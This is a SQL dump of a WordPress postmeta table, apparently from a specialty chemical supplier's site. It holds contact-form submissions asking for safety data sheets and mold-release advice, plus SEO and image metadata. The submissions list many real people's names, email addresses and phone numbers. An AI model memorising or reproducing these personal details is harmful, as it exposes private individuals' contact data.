INSERT INTO `wp_postmeta` VALUES (25870, 2956, '_field_10', 'Honda Aero Inc.'); 
INSERT INTO `wp_postmeta` VALUES (25871, 2956, '_field_2', 'larry_muehleisen@honda-aero.com'); 
INSERT INTO `wp_postmeta` VALUES (25872, 2956, '_field_8', '(336) 524-2619'); 
INSERT INTO `wp_postmeta` VALUES (25873, 2956, '_field_3', 'I would like more information on your PTFE Release Agents and Thermoset polysiloxanes mold release agents for use in a compression molding operation for CFRP materials. We are currently using Chemtrend release products and in the past have used Frekote, but are exploring other options.'); 
INSERT INTO `wp_postmeta` VALUES (25874, 2956, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (25875, 2956, '_sub_id', '2956'); 
INSERT INTO `wp_postmeta` VALUES (25894, 2976, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (25895, 2976, '_seq_num', '111'); 
INSERT INTO `wp_postmeta` VALUES (25896, 2976, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25897, 2976, '_field_12', 'Dianne Snider'); 
INSERT INTO `wp_postmeta` VALUES (25898, 2976, '_field_13', ''); 
INSERT INTO `wp_postmeta` VALUES (25899, 2976, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (25900, 2976, '_field_14', 'dianne.snider@baesystems.com'); 
INSERT INTO `wp_postmeta` VALUES (25901, 2976, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (25902, 2976, '_field_16', 'Please send me the current SDS for MS-381, MS-381M, Connector Cleaner and Lubricant, DPMS T0602A and MS-242N-AS Anti-Static Quik-Freeze\n\n'); 
INSERT INTO `wp_postmeta` VALUES (25903, 2976, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (25904, 2976, '_sub_id', '2976'); 
INSERT INTO `wp_postmeta` VALUES (25906, 2978, '_edit_lock', '1478716130:2'); 
INSERT INTO `wp_postmeta` VALUES (25907, 2978, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (25908, 2979, '_wp_attached_file', '2016/11/shutterstock_275163272.jpg'); 
INSERT INTO `wp_postmeta` VALUES (25909, 2979, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2016/11/shutterstock_275163272.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_275163272-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_275163272-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_275163272-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_275163272-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_275163272-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_275163272-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_275163272-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:50;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (25910, 2978, '_thumbnail_id', '2979'); 
INSERT INTO `wp_postmeta` VALUES (25912, 2978, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (25913, 2978, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (25914, 2978, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (25915, 2978, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (25916, 2978, '_yoast_wpseo_focuskw_text_input', 'Krytox Equipment Selection'); 
INSERT INTO `wp_postmeta` VALUES (25917, 2978, '_yoast_wpseo_focuskw', 'Krytox Equipment Selection'); 
INSERT INTO `wp_postmeta` VALUES (25918, 2978, '_yoast_wpseo_title', 'Krytox Equipment Selection - Applying Krytox™ Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (25919, 2978, '_yoast_wpseo_metadesc', 'Article discussing Krytox equipment selection for applying Krytox lubricants. Krytox lubricants can be used with many grease guns and pumps.'); 
INSERT INTO `wp_postmeta` VALUES (25920, 2978, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (25921, 2978, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (25922, 2978, '_yoast_wpseo_primary_category', '117'); 
INSERT INTO `wp_postmeta` VALUES (25924, 2978, '_yoast_wpseo_linkdex', '86'); 
INSERT INTO `wp_postmeta` VALUES (25926, 2956, '_edit_lock', '1478857424:1'); 
INSERT INTO `wp_postmeta` VALUES (25930, 2983, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (25931, 2983, '_seq_num', '112'); 
INSERT INTO `wp_postmeta` VALUES (25932, 2983, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25933, 2983, '_field_12', 'Scott Fisher'); 
INSERT INTO `wp_postmeta` VALUES (25934, 2983, '_field_13', 'Lawrence Livermore Nat&#039;l Lab'); 
INSERT INTO `wp_postmeta` VALUES (25935, 2983, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (25936, 2983, '_field_14', 'fisher43@llnl.gov'); 
INSERT INTO `wp_postmeta` VALUES (25937, 2983, '_field_15', '(925) 699-4659'); 
INSERT INTO `wp_postmeta` VALUES (25938, 2983, '_field_16', 'Looking for a release agent that can be used on Lucite/Acrylic. Mold has optical finished surface and no bake on agents.'); 
INSERT INTO `wp_postmeta` VALUES (25939, 2983, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (25940, 2983, '_sub_id', '2983'); 
INSERT INTO `wp_postmeta` VALUES (25941, 2984, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (25942, 2984, '_seq_num', '113'); 
INSERT INTO `wp_postmeta` VALUES (25943, 2984, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25944, 2984, '_field_12', 'Paul Martens'); 
INSERT INTO `wp_postmeta` VALUES (25945, 2984, '_field_13', 'Markem-Imaje'); 
INSERT INTO `wp_postmeta` VALUES (25946, 2984, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (25947, 2984, '_field_14', 'pmartens@markem-imaje.com'); 
INSERT INTO `wp_postmeta` VALUES (25948, 2984, '_field_15', '(603) 283-2903'); 
INSERT INTO `wp_postmeta` VALUES (25949, 2984, '_field_16', 'I am looking for help in selecting a mold release agent for release of a thermoset polyimide thin film from steel or aluminum mandrel  the polyimide coating is cured at 300 deg. C'); 
INSERT INTO `wp_postmeta` VALUES (25950, 2984, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (25951, 2984, '_sub_id', '2984'); 
INSERT INTO `wp_postmeta` VALUES (25952, 2985, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (25953, 2985, '_seq_num', '114'); 
INSERT INTO `wp_postmeta` VALUES (25954, 2985, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25955, 2985, '_field_12', 'Gary Wadkins'); 
INSERT INTO `wp_postmeta` VALUES (25956, 2985, '_field_13', 'USAF Randolph AFB, Texas'); 
INSERT INTO `wp_postmeta` VALUES (25957, 2985, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (25958, 2985, '_field_14', 'gary.wadkins@us.af.mil'); 
INSERT INTO `wp_postmeta` VALUES (25959, 2985, '_field_15', '(210) 652-3781'); 
INSERT INTO `wp_postmeta` VALUES (25960, 2985, '_field_16', 'I&#039;m just looking for the SDS for Release Agent \nPTFE Release Agent/Dry Lubricant\n9150-01-443-9003'); 
INSERT INTO `wp_postmeta` VALUES (25961, 2985, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (25962, 2985, '_sub_id', '2985'); 
INSERT INTO `wp_postmeta` VALUES (25963, 2986, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (25964, 2986, '_seq_num', '104'); 
INSERT INTO `wp_postmeta` VALUES (25965, 2986, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25966, 2986, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (25967, 2986, '_field_1', 'Cj schmidt'); 
INSERT INTO `wp_postmeta` VALUES (25968, 2986, '_field_10', 'Bay land llc'); 
INSERT INTO `wp_postmeta` VALUES (25969, 2986, '_field_2', 'Cjschmidt2016@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (25970, 2986, '_field_8', '(920) 217-0638'); 
INSERT INTO `wp_postmeta` VALUES (25971, 2986, '_field_3', 'Pls call re a mold release application thx. CJ'); 
INSERT INTO `wp_postmeta` VALUES (25972, 2986, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (25973, 2986, '_sub_id', '2986'); 
INSERT INTO `wp_postmeta` VALUES (25974, 2987, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (25975, 2987, '_seq_num', '105'); 
INSERT INTO `wp_postmeta` VALUES (25976, 2987, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25977, 2987, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (25978, 2987, '_field_1', 'Edward Witek'); 
INSERT INTO `wp_postmeta` VALUES (25979, 2987, '_field_10', 'GE'); 
INSERT INTO `wp_postmeta` VALUES (25980, 2987, '_field_2', 'edwardJ.witek@ge.com'); 
INSERT INTO `wp_postmeta` VALUES (25981, 2987, '_field_8', '(330) 963-2389'); 
INSERT INTO `wp_postmeta` VALUES (25982, 2987, '_field_3', 'I am looking for SDS for the following products:\nMS-470N Urethane Conformal Coating \nMS-122DF PTFE Release Agent/Dry Lubricant\nThank you for your time &amp; have a great day.'); 
INSERT INTO `wp_postmeta` VALUES (25983, 2987, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (25984, 2987, '_sub_id', '2987'); 
INSERT INTO `wp_postmeta` VALUES (25985, 2988, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (25986, 2988, '_seq_num', '115'); 
INSERT INTO `wp_postmeta` VALUES (25987, 2988, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25988, 2988, '_field_12', 'Jonathan Voss'); 
INSERT INTO `wp_postmeta` VALUES (25989, 2988, '_field_13', 'L-3 Communications, Link Simulation &amp; Training'); 
INSERT INTO `wp_postmeta` VALUES (25990, 2988, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (25991, 2988, '_field_14', 'jonathan.voss@l-3com.com'); 
INSERT INTO `wp_postmeta` VALUES (25992, 2988, '_field_15', '(803) 666-5273'); 
INSERT INTO `wp_postmeta` VALUES (25993, 2988, '_field_16', 'I need access to get the MSDS for your Plastic Metal Glass Cleaner. Thanks.'); 
INSERT INTO `wp_postmeta` VALUES (25994, 2988, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (25995, 2988, '_sub_id', '2988'); 
INSERT INTO `wp_postmeta` VALUES (25996, 984, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (25997, 984, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (25998, 984, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (25999, 984, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (26000, 984, '_ywtm_content_tab_description', 'Krytox FPG 028 is a perfluoropolyether (PFPE)-based grease thickened with a special high performance PTFE thickener, and has exceptional chemical and oxygen resistance. It is designed to operate under severe conditions, and can be used for bearings, gears, and as a lubricant for O-rings and elastomers.\r\n\r\n<strong>Storage and Handling</strong>\r\nDoes not oxidize or degrade from atmospheric contact. Life of uncontaminated product in reclosed container is undiminished. Indefinite shelf life in unopened container. It is normal for oil to separate from grease during storage. Before use, knead tubes or stir larger containers to remix.\r\n\r\n<strong>Product Package</strong>\r\n\r\nKrytox FPG 028 is available in 50 and 100 g syringes, 8 oz tubes, and 1.76 lb cartridges.'); 
INSERT INTO `wp_postmeta` VALUES (26001, 984, '_yoast_wpseo_linkdex', '79'); 
INSERT INTO `wp_postmeta` VALUES (26002, 2989, '_edit_lock', '1478791526:2'); 
INSERT INTO `wp_postmeta` VALUES (26003, 2989, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (26004, 2990, '_wp_attached_file', '2016/11/shutterstock_106646615.jpg'); 
INSERT INTO `wp_postmeta` VALUES (26005, 2990, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:563;s:4:"file";s:34:"2016/11/shutterstock_106646615.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_106646615-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_106646615-800x450.jpg";s:5:"width";i:800;s:6:"height";i:450;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_106646615-768x432.jpg";s:5:"width";i:768;s:6:"height";i:432;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_106646615-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_106646615-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_106646615-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_106646615-510x563.jpg";s:5:"width";i:510;s:6:"height";i:563;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (26006, 2989, '_thumbnail_id', '2990'); 
INSERT INTO `wp_postmeta` VALUES (26008, 2989, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (26009, 2989, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (26010, 2989, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (26011, 2989, '_yoast_wpseo_focuskw_text_input', 'FPG 028'); 
INSERT INTO `wp_postmeta` VALUES (26012, 2989, '_yoast_wpseo_focuskw', 'FPG 028'); 
INSERT INTO `wp_postmeta` VALUES (26013, 2989, '_yoast_wpseo_title', 'Chemours Introduces Krytox™ FPG 028 Performance Lubricant'); 
INSERT INTO `wp_postmeta` VALUES (26014, 2989, '_yoast_wpseo_metadesc', 'Krytox™ FPG 028 is MIL-PRF-27617 TYPE IV specified and has AFPET/PTPT approval. Designed for use in aircraft and supporting equipment.'); 
INSERT INTO `wp_postmeta` VALUES (26015, 2989, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (26016, 2989, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (26017, 2989, '_yoast_wpseo_primary_category', '117'); 
INSERT INTO `wp_postmeta` VALUES (26019, 2989, '_yoast_wpseo_linkdex', '98'); 
INSERT INTO `wp_postmeta` VALUES (26023, 2989, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (26024, 118, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (26025, 118, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (26026, 118, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (26027, 118, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (26028, 2996, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26029, 2996, '_seq_num', '116'); 
INSERT INTO `wp_postmeta` VALUES (26030, 2996, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26031, 2996, '_field_12', 'Charles'); 
INSERT INTO `wp_postmeta` VALUES (26032, 2996, '_field_13', 'University of Arkansas'); 
INSERT INTO `wp_postmeta` VALUES (26033, 2996, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (26034, 2996, '_field_14', 'cbs009@uark.edu'); 
INSERT INTO `wp_postmeta` VALUES (26035, 2996, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (26036, 2996, '_field_16', 'I need an SDS for Epon 828'); 
INSERT INTO `wp_postmeta` VALUES (26037, 2996, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26038, 2996, '_sub_id', '2996'); 
INSERT INTO `wp_postmeta` VALUES (26041, 2999, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26042, 2999, '_seq_num', '117'); 
INSERT INTO `wp_postmeta` VALUES (26043, 2999, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26044, 2999, '_field_12', 'Hancy Barnes'); 
INSERT INTO `wp_postmeta` VALUES (26045, 2999, '_field_13', 'Veterans Health Administration'); 
INSERT INTO `wp_postmeta` VALUES (26046, 2999, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (26047, 2999, '_field_14', 'hancy.barnes@va.gov'); 
INSERT INTO `wp_postmeta` VALUES (26048, 2999, '_field_15', '(314) 894-6100'); 
INSERT INTO `wp_postmeta` VALUES (26049, 2999, '_field_16', 'Hello, I am looking for the Safety Data Sheet for Freon TF Solvent.  Thank you!'); 
INSERT INTO `wp_postmeta` VALUES (26050, 2999, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26051, 2999, '_sub_id', '2999'); 
INSERT INTO `wp_postmeta` VALUES (26052, 3000, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26053, 3000, '_seq_num', '106'); 
INSERT INTO `wp_postmeta` VALUES (26054, 3000, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26055, 3000, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26056, 3000, '_field_1', 'Scarlett Frost'); 
INSERT INTO `wp_postmeta` VALUES (26057, 3000, '_field_10', 'Acute Marketing Solutions Inc'); 
INSERT INTO `wp_postmeta` VALUES (26058, 3000, '_field_2', 'scarlett@acutemarketingsolutions.com'); 
INSERT INTO `wp_postmeta` VALUES (26059, 3000, '_field_8', '5158616600'); 
INSERT INTO `wp_postmeta` VALUES (26060, 3000, '_field_3', 'Hi,\r\n\r\nWe are B2B database provider. Would you be interested in discussing about the database of Space industry. \r\n\r\nWe have the complete contact details and verified email addresses of Presidents, VPs, CEOs, CTOs, MDs, GMs, Spacecraft and \r\n\r\nSatellite Engineers, Buyers and Procurement Specialists, Test and Measurement Engineers, Program Managers, Design and R&amp;D \r\n\r\nEngineers, Project Managers, Electrical and Mechanical Engineers, Software Engineers, Scientists, Aerospace Engineers, Systems \r\n\r\nand Application Engineers, Quality Control Managers, Space Agencies, Principal Engineers and Engineering Managers, Materials and \r\n\r\nProcess Engineers, Business Development Managers/Directors, Manufacturing and Instrumentation Engineers Consultants, Field Sales \r\n\r\nand Product Engineers and many more.\r\n\r\nKindly let me know your target criteria so that we can provide you exact counts associated with you criteria:\r\n\r\nTarget Industry :\r\nTarget Job Title :\r\nTarget Geography :\r\n\r\nBest Regards,\r\n\r\nScarlett Frost\r\nMarketing Manager\r\nAcute Marketing Solutions Inc.'); 
INSERT INTO `wp_postmeta` VALUES (26061, 3000, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26062, 3000, '_sub_id', '3000'); 
INSERT INTO `wp_postmeta` VALUES (26063, 3001, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26064, 3001, '_seq_num', '118'); 
INSERT INTO `wp_postmeta` VALUES (26065, 3001, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26066, 3001, '_field_12', 'Kristine Petrella'); 
INSERT INTO `wp_postmeta` VALUES (26067, 3001, '_field_13', 'Siemens Healthineers'); 
INSERT INTO `wp_postmeta` VALUES (26068, 3001, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (26069, 3001, '_field_14', 'kristine.petrella@siemens.com'); 
INSERT INTO `wp_postmeta` VALUES (26070, 3001, '_field_15', '(302) 631-8084'); 
INSERT INTO `wp_postmeta` VALUES (26071, 3001, '_field_16', 'I need access to SDS forms for Miller-Stephenson products that we have in our lab. '); 
INSERT INTO `wp_postmeta` VALUES (26072, 3001, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26073, 3001, '_sub_id', '3001'); 
INSERT INTO `wp_postmeta` VALUES (26074, 3001, '_edit_lock', '1478830764:3'); 
INSERT INTO `wp_postmeta` VALUES (26075, 2988, '_edit_lock', '1478830781:3'); 
INSERT INTO `wp_postmeta` VALUES (26076, 2984, '_edit_lock', '1478830792:3'); 
INSERT INTO `wp_postmeta` VALUES (26077, 2999, '_edit_lock', '1478830811:3'); 
INSERT INTO `wp_postmeta` VALUES (26078, 3002, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26079, 3002, '_seq_num', '107'); 
INSERT INTO `wp_postmeta` VALUES (26080, 3002, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26081, 3002, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26082, 3002, '_field_1', 'sophia'); 
INSERT INTO `wp_postmeta` VALUES (26083, 3002, '_field_10', 'Yil-long Chemical group'); 
INSERT INTO `wp_postmeta` VALUES (26084, 3002, '_field_2', 'sophia@yil-long.com'); 
INSERT INTO `wp_postmeta` VALUES (26085, 3002, '_field_8', '(086) 021-2132'); 
INSERT INTO `wp_postmeta` VALUES (26086, 3002, '_field_3', 'Dear Purchasing manager,  \n  \nGood day! Glad to take this opportunity to contact you, my name is Sophia, from Yil-long Chemical Group, now I responsible for our North&amp;\nSouth American market, if you have any inquiry or orders, welcome to contact me.\n\nAs a leading supplier of chemical raw materials for paints, coating, construction area, we&#039;ve started the international marketing since 2002. \nWe&#039;ve gained fruitful success and the marketing channels are getting maturer year after year. We&#039;re eager to build a win-win situation with \nyou in near future!\n \nI just review your website and though maybe you’ll interest in our following products:\n \nCELOCELL - Cellulose ethers(Thickeners for paints and water retention agent for drymixes)\nTIONOX - Titanium dioxide pigments(white pigment for water-based paints, powder coatings, masterbatch, ink, plastic)\nFEONOX- Iron oxide pigments(It can be used for concrete pavements, paint, coatings, blocks and constructions, ceramics, asphalt, rubber\nand plastics)\nOPTISIL PS20- Calcined Kaolin(It is the best extender of titanium dioxide with the excellent opacity that can improve efficiency and cut costs\nby partly replacing titanium dioxide)\nBENTOGEL – Organo Clay(It is rheological additives for wood coating, marine paints, Anti-rust and anti-corrosion coatings etc.)\nBLANC FIXE L - Barium Sulphate(It is used as an extender &amp; filler in powder coatings &amp; paints)\nESTEROL - Ester alcohol(It&#039;s the coalescent agent for latex paints, inks and industrial coatings)\nREDIPOL - Redispersible powder polymer(Elasticity and adhesive agent for drymixes)\nCALPHOS N- Sodium Hexametaphosphate(pigment disperser and filler with the formulation of Na3PO4)\n\nYou can point out some and I&#039;ll give you further details if you prefer. Looking forward to your favorable reply.\n\n\nBest Regards,\n\nSophia Huang\nSales Manager\n\nYil-Long Chemical Group Ltd\nFeilo Plaza 601/6F No 398 YongHe Rd, 200072\nShanghai, China\nPhone:  +(86 21) 65266643\nFax:       +(86 21) 65266463\nGsm:     +86 136 1185 7173\nSkype:   fishgirler1207\nwww.yil-long.com '); 
INSERT INTO `wp_postmeta` VALUES (26087, 3002, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26088, 3002, '_sub_id', '3002'); 
INSERT INTO `wp_postmeta` VALUES (26089, 3004, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26090, 3004, '_seq_num', '119'); 
INSERT INTO `wp_postmeta` VALUES (26091, 3004, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26092, 3004, '_field_12', 'David Barlow'); 
INSERT INTO `wp_postmeta` VALUES (26093, 3004, '_field_13', ''); 
INSERT INTO `wp_postmeta` VALUES (26094, 3004, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (26095, 3004, '_field_14', 'dbarlow@primus.ca'); 
INSERT INTO `wp_postmeta` VALUES (26096, 3004, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (26097, 3004, '_field_16', 'Will you please advise on the suitability of MS-907 for gluing thick flat sheets of bakelite? I have sheets of 1 inch thick bakelite which I must bond together to make 1-3/4 inch thick pieces for milling.'); 
INSERT INTO `wp_postmeta` VALUES (26098, 3004, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26099, 3004, '_sub_id', '3004'); 
INSERT INTO `wp_postmeta` VALUES (26101, 3006, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26102, 3006, '_seq_num', '120'); 
INSERT INTO `wp_postmeta` VALUES (26103, 3006, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26104, 3006, '_field_12', 'Richard Wurst'); 
INSERT INTO `wp_postmeta` VALUES (26105, 3006, '_field_13', 'MSC'); 
INSERT INTO `wp_postmeta` VALUES (26106, 3006, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (26107, 3006, '_field_14', 'rlwurst@michscimfd.com'); 
INSERT INTO `wp_postmeta` VALUES (26108, 3006, '_field_15', '(248) 685-3000'); 
INSERT INTO `wp_postmeta` VALUES (26109, 3006, '_field_16', 'Please send SDS for MS-720'); 
INSERT INTO `wp_postmeta` VALUES (26110, 3006, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26111, 3006, '_sub_id', '3006'); 
INSERT INTO `wp_postmeta` VALUES (26112, 3007, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26113, 3007, '_seq_num', '121'); 
INSERT INTO `wp_postmeta` VALUES (26114, 3007, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26115, 3007, '_field_12', 'Pisit Khuon'); 
INSERT INTO `wp_postmeta` VALUES (26116, 3007, '_field_13', 'Davol Inc'); 
INSERT INTO `wp_postmeta` VALUES (26117, 3007, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (26118, 3007, '_field_14', 'pisit.khuon@crbard.com'); 
INSERT INTO `wp_postmeta` VALUES (26119, 3007, '_field_15', '(401) 825-8541'); 
INSERT INTO `wp_postmeta` VALUES (26120, 3007, '_field_16', 'I&#039;d like to request SDS for P/N RA/IPA-15 PTFE Lubricant.  Thank you.'); 
INSERT INTO `wp_postmeta` VALUES (26121, 3007, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26122, 3007, '_sub_id', '3007'); 
INSERT INTO `wp_postmeta` VALUES (26123, 3008, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26124, 3008, '_seq_num', '122'); 
INSERT INTO `wp_postmeta` VALUES (26125, 3008, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26126, 3008, '_field_12', 'Jeff Schmidt'); 
INSERT INTO `wp_postmeta` VALUES (26127, 3008, '_field_13', 'Orbital ATK'); 
INSERT INTO `wp_postmeta` VALUES (26128, 3008, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (26129, 3008, '_field_14', 'jeff.schmidt@orbitalatk.com'); 
INSERT INTO `wp_postmeta` VALUES (26130, 3008, '_field_15', '(801) 774-4171'); 
INSERT INTO `wp_postmeta` VALUES (26131, 3008, '_field_16', 'Request the current USA (English) SDS for MS-782.  Thank you.'); 
INSERT INTO `wp_postmeta` VALUES (26132, 3008, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26133, 3008, '_sub_id', '3008'); 
INSERT INTO `wp_postmeta` VALUES (26134, 3009, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26135, 3009, '_seq_num', '108'); 
INSERT INTO `wp_postmeta` VALUES (26136, 3009, '_action', 'submit'); 
